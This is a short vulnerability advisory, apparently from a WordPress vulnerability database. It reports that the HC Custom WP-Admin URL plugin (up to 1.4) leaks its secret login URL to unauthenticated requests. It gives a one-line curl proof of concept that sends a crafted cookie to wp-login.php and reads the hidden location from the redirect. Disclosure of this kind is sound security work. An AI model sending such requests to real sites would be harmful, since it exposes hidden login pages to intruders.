WordPress Plugin Vulnerabilities
HC Custom WP-Admin URL <= 1.4 - Unauthenticated Secret URL Disclosure
Description
The plugin leaks the secret login URL when sending a specific crafted request
Proof of Concept
curl -sIXGET -H "Cookie: valid_login_slug=1" https://example.com/wp-login.php HTTP/2 302 x-redirect-by: WordPress location: secret
Affects Plugins
No known fix - plugin closed
References
Classification
Type
BYPASS
Miscellaneous
Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
Verified
Yes
Timeline
Publicly Published
2022-05-18 (about 2 months ago)
Added
2022-05-18 (about 2 months ago)
Last Updated
2022-05-18 (about 2 months ago)